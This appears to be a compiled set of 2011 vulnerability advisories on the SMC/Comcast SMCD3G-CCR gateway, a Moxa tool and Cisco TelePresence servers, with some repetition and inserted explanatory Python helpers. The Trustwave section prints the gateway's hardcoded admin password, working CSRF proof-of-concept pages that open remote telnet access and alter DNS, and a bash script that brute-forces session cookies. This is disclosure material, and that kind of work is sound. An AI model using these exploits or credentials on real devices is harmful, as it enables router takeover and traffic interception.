Through this, an attacker can brute-force the possible valid session IDs. Sessions expire by default within 10 minutes, so the attack window is limited, but it can be leveraged with other attack methods.

Vendor Response: These issues have been addressed as of version 1.4.0.49.2

Remediation Steps: In order to determine if the correct version is installed, users should view the "About" link in the management interface. Versions 1.4.0.49.2 and above have been corrected.

Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published

Revision History:
1.0 Initial publication

References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
VAR-201102-0085 CVE-2011-0887 SMC SMCD3G-CCR of Web Management portal Vulnerable to session hijacking CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS business gateways are prone to multiple cross-site request-forgery and security-bypass vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected.

TITLE: SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID: SA43199
VERIFY ADVISORY: http://secunia.com/advisories/43199/
RELEASE DATE: 2011-03-05

DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks.
1) The web management application generates session identifiers incrementally, which can be exploited to brute force a valid session identifier via the "userid" cookie.
2) The web management application allows users to perform certain actions via HTTP requests without properly verifying the validity of those requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while logged in to the application.

SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.

PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.

ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
VAR-201102-0083 CVE-2011-0885 SMC SMCD3G-CCR of specific Comcast Business Gateway Vulnerabilities that gain management access in settings CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: SMC SMCD3G-CCR Two Vulnerabilities SECUNIA ADVISORY ID: SA43199 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43199/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 RELEASE DATE: 2011-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/43199/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43199/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ 
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks. 1) The web management application generates session identifiers incrementally, which can be exploited to brute force a valid session identifier via the "userid" cookie. 2) The web management application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while being logged-in to the application. SOLUTION: Reportedly fixed in firmware version 1.4.0.49.2. PROVIDED AND/OR DISCOVERED BY: Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs. ORIGINAL ADVISORY: Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) 
http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2011-001: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of "mso" with the password of "D0nt4g3tme". These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. 
These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm <html> <body> <iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"> </iframe> </body> </html> ## smcd3g-csrf-poc-1.htm <html> <body> <form action="http://10.1.10.1/goform/login" method="post" name="tF"> <input type="hidden" name="user" value="mso" /> <input type="hidden" name="pws" value="D0nt4g3tme" /> </form> <script> document.tF.submit(); </script> </body> </html> ## smcd3g-csrf-poc-2.htm <html> <body> <form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post"> <input type="hidden" value="feat-admin-remote" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" name="RemoteRange" value="0" /> <input type="hidden" name="rm_access" value="on" /> <input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input type="hidden" name="http_port" value="8080" /> <input type="hidden" name="http_enable" value="on" /> <input type="hidden" name="http_flag" value="1" /> <input type="hidden" name="msoremote_enableCheck" value="on" /> <input type="hidden" name="mso_remote_enable" value="1" /> <input type="hidden" 
name="remote_enable" value="0" /> <input type="hidden" name="https_enable" value="on" /> <input type="hidden" name="https_port" value="8181" /> <input type="hidden" name="https_flag" value="1" /> <input type="hidden" name="telnet_enable" value="on" /> <input type="hidden" name="telnet_port" value="2323" /> <input type="hidden" name="telnet_flag" value="1" /> <input type="hidden" name="Remote1=" value="" /> </form> </body> </html> <script> setTimeout("document.RMangement.submit()",4000); </script> </body> </html> ## smcd3g-csrf-poc-3.htm <html> <body> <form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post"> <input type="hidden" value="feat-wan-ip" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" value="Fixed" name="DNSAssign"> <input type="hidden" value="0" name="dhcpc_release"> <input type="hidden" value="0" name="dhcpc_renew"> <input type="hidden" value="" name="domain_name"> <input type="hidden" value="" name="WDn"> <input type="hidden" name="SysName" value="" /> <input type="hidden" name="manual_dns_enable" value="on" /> <input type="hidden" name="DAddr" value="4.2.2.1" /> <input type="hidden" name="DAddr0" value="4" /> <input type="hidden" name="DAddr1" value="2" /> <input type="hidden" name="DAddr2" value="2" /> <input type="hidden" name="DAddr3" value="1" /> <input type="hidden" name="PDAddr" value="4.2.2.2" /> <input type="hidden" name="PDAddr0" value="4" /> <input type="hidden" name="PDAddr1" value="2" /> <input type="hidden" name="PDAddr2" value="2" /> <input type="hidden" name="PDAddr3" value="2" /> </form> <script> setTimeout("document.WanIPform.submit()",5000); </script> </body> </html> If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. 
Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a predictable value to validate the active web management portal session. The epoch time of beginning of the session is stored as a cookie labeled "userid". This provides a predictable range of session IDs that can be brute-forced. The following PoC attempts to brute force the session IDs by requesting the admin page with an incrementing cookie and determining whether it wants to redirect to login.asp. ## smcd3g-session-poc.sh #!/bin/bash start=1267604160 end=1267605960 for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ] then echo "Session ID Found: $i" fi if [ $(($i % 100)) -eq "0" ] then echo "Currently at $i" fi done Through this, an attacker can brute-force the possible valid session IDs. Sessions do by default expire within 10 minutes, thus the attack window is limited but can be leveraged with other attack methods. Vendor Response: These issues have been addressed as of version 1.4.0.49.2 Remediation Steps: In order to determine if the correct version is installed, users should view the "About" link in the management interface. Versions 1.4.0.49.2 and above have been corrected. Vendor Communication Timeline: 08/30/10 - Vulnerability disclosed 01/21/11 - Patch Released 02/04/11 - Advisory Published Revision History: 1.0 Initial publication References 1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. 
For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
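The brute force in Finding 3 of the Trustwave advisory above works because the search space is tiny: an epoch-time cookie belonging to a session that has not yet expired can only take on a few hundred values. The following Python is an added example, not Trustwave's PoC and not SMC firmware code. It models the flawed scheme, enumerates the candidate window an attacker has to cover, runs the same newest-first search against a simulated validity oracle (standing in for the PoC's curl-and-grep probe), and contrasts the result with a session identifier drawn from the OS CSPRNG. The 600-second lifetime comes from the advisory; the function names, the in-memory oracle and the sample timestamps are assumptions made for the illustration.

```python
# Added example: models the SMCD3G-CCR epoch-time session cookie and contrasts it
# with a CSPRNG-generated identifier. Not the Trustwave PoC and not vendor code;
# the names, the simulated oracle and the sample timestamps are assumptions.
import secrets

SESSION_LIFETIME = 600  # seconds; the advisory says sessions expire within 10 minutes


def predictable_session_id(login_time):
    """The flawed scheme: the "userid" cookie is simply the login epoch time."""
    return int(login_time)


def candidate_session_ids(now, lifetime=SESSION_LIFETIME):
    """All values a still-valid session could carry at `now`.

    A live session must have started within the last `lifetime` seconds, so
    there are only lifetime + 1 candidates, however the attacker obtains
    `now` (local clock, or the Date header of any response from the device).
    """
    now = int(now)
    return range(now - lifetime, now + 1)


def response_indicates_login(body):
    """The PoC's oracle: a response that bounces to login.asp carried a bad cookie."""
    return "login.asp" in body


def brute_force(now, is_valid, lifetime=SESSION_LIFETIME):
    """Walk the window newest-first (recent logins are most likely still alive).

    Returns (session_id, requests_made), or (None, requests_made) if nothing
    in the window is live. `is_valid` stands in for one HTTP probe per
    candidate and is never called more than lifetime + 1 times.
    """
    attempts = 0
    for cand in reversed(candidate_session_ids(now, lifetime)):
        attempts += 1
        if is_valid(cand):
            return cand, attempts
    return None, attempts


def secure_session_id(nbytes=32):
    """What the cookie should be: 256 bits from the OS CSPRNG, never a timestamp."""
    return secrets.token_urlsafe(nbytes)


def search_space_ratio(lifetime=SESSION_LIFETIME, nbytes=32):
    """How many times larger the random-identifier space is than the timestamp window."""
    return 2 ** (8 * nbytes) // (lifetime + 1)


if __name__ == "__main__":
    # Constructed scenario: the administrator logged in 137 s before the attack starts.
    now = 1267605960
    live = predictable_session_id(now - 137)
    found, probes = brute_force(now, lambda cand: cand == live)
    print(f"recovered {found} after {probes} probes (at most {SESSION_LIFETIME + 1})")
    print(f"random id example: {secure_session_id()}")
    print(f"random space is {search_space_ratio():.3e}x larger than the window")
```

The newest-first order matters in practice: the advisory's own script counts upward from a fixed start, which spends most of its requests on timestamps that have already expired.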
VAR-201102-0386 No CVE Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability CVSS V2: -
CVSS V3: -
Severity: LOW
Moxa Device Manager is a remote management tool for Moxa's embedded computers. A boundary error in the "MDMUtil.dll" module when processing certain messages can be exploited to trigger a stack-based buffer overflow by tricking a user into connecting to a malicious MDM gateway. Successful exploitation allows execution of arbitrary code in the security context of the application. Failed exploit attempts will result in a denial-of-service condition.
VAR-201102-0225 CVE-2011-0385 Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Arbitrary File Creation Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The issue is tracked as Cisco Bug IDs CSCth85786 and CSCth61065. A third party could create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. An unauthenticated remote attacker can send crafted requests to an affected device and create files with arbitrary content anywhere on the device. To exploit this vulnerability, an attacker sends a specially crafted request to the device's TCP port 80 or 443. The issue occurs because the application fails to adequately sanitize user-supplied input; an attacker can exploit it to upload arbitrary files to the web server. The solution provides components such as audio and video spaces, which give remote participants the effect of a "face-to-face" virtual meeting room.

Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Recording Server
Advisory ID: cisco-sa-20110223-telepresence-ctrs
Revision 1.0
For Public Release 2011 February 23 1600 UTC (GMT)

Summary
=======
Multiple vulnerabilities exist within the Cisco TelePresence Recording Server. The defect that is related to each component is covered in each associated advisory. 
All releases of Cisco TelePresence software prior to 1.7.1 are affected by one or more of the vulnerabilities listed in this advisory. To determine the current version of software that is running on the Cisco TelePresence Recording Server, SSH into the device and issue the show version active and the show version inactive commands. The output should resemble the following example:

admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.

admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.

In the preceding example, the system has versions 1.6.2 and 1.7.0 loaded on the device and version 1.7.0 is currently active. A device is affected only by vulnerabilities that are present in the active software version.

Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these vulnerabilities.

Details
=======
The Cisco TelePresence solution allows for immersive, in-person communication and collaboration over the network with colleagues, prospects, and partners even when they are located in opposite hemispheres. These vulnerabilities are independent of each other.

Unauthenticated Java Servlet Access
+----------------------------------
A number of sensitive Java Servlets delivered via a Java Servlet framework within the Cisco TelePresence Recording Server could allow a remote, unauthenticated attacker to perform actions that should be restricted to administrative users.

* Cisco TelePresence Recording Server - CSCtf42005 (registered customers only) has been assigned the CVE identifier CVE-2011-0383. 
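A quick way to apply the rule above during triage, as an added example that is not Cisco's own tooling: parse the show version active output, ignore the inactive partition (the advisory says only the active image matters), and compare the active version against the first fixed release, 1.7.1. The regular expression, the function names and the sample transcript are assumptions made for this illustration; the transcript reproduces the example output printed in the advisory.

```python
# Added example (not Cisco tooling): decide from "show version active" output
# whether a Cisco TelePresence Recording Server runs a release prior to 1.7.1.
# Function names, the regex and the sample transcript are assumptions.
import re

FIRST_FIXED = (1, 7, 1)  # "All releases ... prior to 1.7.1 are affected"

# Constructed transcript, matching the example output shown in the advisory.
SAMPLE_OUTPUT = """admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.
admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.
"""

# Anchored at line start so "Inactive Master Version" can never match.
_ACTIVE_RE = re.compile(
    r"^Active Master Version:\s*(\d+(?:\.\d+)*)(?:-(\S+))?", re.MULTILINE
)


def parse_active_version(output):
    """Return (version_tuple, build) for the ACTIVE partition, or None if absent.

    An output that only contains an "Inactive Master Version" line yields None:
    the inactive image is irrelevant to exposure, per the advisory.
    """
    m = _ACTIVE_RE.search(output)
    if not m:
        return None
    version = tuple(int(part) for part in m.group(1).split("."))
    return version, m.group(2)


def is_affected(version, first_fixed=FIRST_FIXED):
    """True when `version` sorts before `first_fixed`.

    Tuples of unequal length are zero-padded so 1.7.1 == 1.7.1.0 and 1.7 < 1.7.1;
    comparing numerically also avoids the "1.10" < "1.7" mistake of string compares.
    """
    width = max(len(version), len(first_fixed))
    padded = version + (0,) * (width - len(version))
    fixed = first_fixed + (0,) * (width - len(first_fixed))
    return padded < fixed


def assess(output):
    """Combine both steps: returns 'affected', 'fixed' or 'unknown'."""
    parsed = parse_active_version(output)
    if parsed is None:
        return "unknown"
    return "affected" if is_affected(parsed[0]) else "fixed"


if __name__ == "__main__":
    print(parse_active_version(SAMPLE_OUTPUT), assess(SAMPLE_OUTPUT))
```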
CGI Command Injection
+--------------------
* Cisco TelePresence Recording Server - CSCtf97221 (registered customers only) has been assigned the CVE identifier CVE-2011-0382.

Unauthenticated Arbitrary File Upload
+------------------------------------
* Cisco TelePresence Recording Server - CSCth85786 (registered customers only) has been assigned the CVE identifier CVE-2011-0385.

XML-RPC Arbitrary File Overwrite
+-------------------------------
This vulnerability could be leveraged to obtain full control of the affected device.

* Cisco TelePresence Recording Server - CSCti50739 (registered customers only) has been assigned the CVE identifier CVE-2011-0386.

Cisco Discovery Protocol Remote Code Execution
+---------------------------------------------
This vulnerability could allow an unauthenticated, adjacent attacker to trigger a buffer overflow condition. Because Cisco Discovery Protocol works at the data-link layer (Layer 2), an attacker must have a way to submit an Ethernet frame directly to an affected device. This may be possible in situations where the affected system is part of a bridged network or connected to a nonpartitioned device such as a network hub.

* Cisco TelePresence Recording Server - CSCtd75769 (registered customers only) has been assigned the CVE identifier CVE-2011-0379.

Ad Hoc Recording Denial of Service
+---------------------------------
A denial of service vulnerability exists within Cisco TelePresence Recording Server devices. A restart of the affected device may be required to regain functionality.

* Cisco TelePresence Recording Server - CSCtf97205 (registered customers only) has been assigned the CVE identifier CVE-2011-0391.

Java RMI Denial of Service
+-------------------------
A denial of service vulnerability exists within Cisco TelePresence Recording Server devices due to a failure to properly restrict access to the RMI interface of the Java Servlet framework. An unauthenticated, remote attacker could trigger an out-of-memory condition on the Servlet host by issuing a series of crafted requests.

* Cisco TelePresence Recording Server - CSCtg35830 (registered customers only) has been assigned the CVE identifier CVE-2011-0388.

Unauthenticated XML-RPC Interface
+--------------------------------
This vulnerability could allow an unauthenticated, remote attacker to perform a limited number of actions on the system that should be restricted to authorized users.

* Cisco TelePresence Recording Server - CSCtg35833 (registered customers only) has been assigned the CVE identifier CVE-2011-0392.

Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Cisco Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss. 
* CSCtf42005 - Unauthenticated Java Servlet Access
  CVSS Base Score - 10 (Access Vector - Network, Access Complexity - Low, Authentication - None, Confidentiality Impact - Complete, Integrity Impact - Complete, Availability Impact - Complete)
  CVSS Temporal Score - 8.3 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCtf97221 - CGI Command Injection
  CVSS Base Score - 10 (Access Vector - Network, Access Complexity - Low, Authentication - None, Confidentiality Impact - Complete, Integrity Impact - Complete, Availability Impact - Complete)
  CVSS Temporal Score - 8.3 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCth85786 - Unauthenticated Arbitrary File Upload
  CVSS Base Score - 10 (Access Vector - Network, Access Complexity - Low, Authentication - None, Confidentiality Impact - Complete, Integrity Impact - Complete, Availability Impact - Complete)
  CVSS Temporal Score - 8.3 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCti50739 - XML-RPC Arbitrary File Overwrite
  CVSS Base Score - 9.3 (Access Vector - Network, Access Complexity - Medium, Authentication - None, Confidentiality Impact - Complete, Integrity Impact - Complete, Availability Impact - Complete)
  CVSS Temporal Score - 7.7 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCtd75769 - Cisco Discovery Protocol Remote Code Execution
  CVSS Base Score - 7.9 (Access Vector - Adjacent Network, Access Complexity - Medium, Authentication - None, Confidentiality Impact - Complete, Integrity Impact - Complete, Availability Impact - Complete)
  CVSS Temporal Score - 6.5 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCtf97205 - Ad Hoc Recording Denial of Service
  CVSS Base Score - 7.8 (Access Vector - Network, Access Complexity - Low, Authentication - None, Confidentiality Impact - None, Integrity Impact - None, Availability Impact - Complete)
  CVSS Temporal Score - 6.4 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCtg35830 - Java RMI Denial of Service
  CVSS Base Score - 7.8 (Access Vector - Network, Access Complexity - Low, Authentication - None, Confidentiality Impact - None, Integrity Impact - None, Availability Impact - Complete)
  CVSS Temporal Score - 6.4 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

* CSCtg35833 - Unauthenticated XML-RPC Interface
  CVSS Base Score - 7.5 (Access Vector - Network, Access Complexity - Low, Authentication - None, Confidentiality Impact - Partial, Integrity Impact - Partial, Availability Impact - Partial)
  CVSS Temporal Score - 6.2 (Exploitability - Functional, Remediation Level - Official-Fix, Report Confidence - Confirmed)

Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access (CSCtf42005) vulnerability could allow an unauthenticated, remote attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the affected device. In some instances this issue could be leveraged to gain complete control of the affected system. Successful exploitation of the Cisco Discovery Protocol Remote Code Execution (CSCtd75769) vulnerability could allow an unauthenticated, adjacent attacker to take complete control of the affected system. Successful exploitation of the Ad Hoc Recording Denial of Service (CSCtf97205) vulnerability could allow an unauthenticated, remote attacker to cause a persistent denial of service condition on an affected device. Successful exploitation of the Java RMI Denial of Service (CSCtg35830) vulnerability could allow an unauthenticated, remote attacker to cause all web-based services to become inaccessible. 
Successful exploitation of the Unauthenticated XML-RPC Interface (CSCtg35833) vulnerability could allow an unauthenticated, remote attacker to perform a number of actions that should be restricted to authenticated users.

Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Each row of the following Cisco TelePresence System Software table defines a specific defect, the first fixed release, and the recommended release to resolve all the security issues identified in this advisory as well as other non-security-related issues. Cisco recommends upgrading to a release equal to or later than the release in the Recommended Release column of the table.

Workarounds
===========
There are no device- or system-based workarounds for the identified vulnerabilities. Additional mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml

Obtaining Fixed Software
========================
Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. 
By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. 
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. All vulnerabilities identified within this Security Advisory were discovered internally by Cisco.

Status of this Notice: FINAL
============================
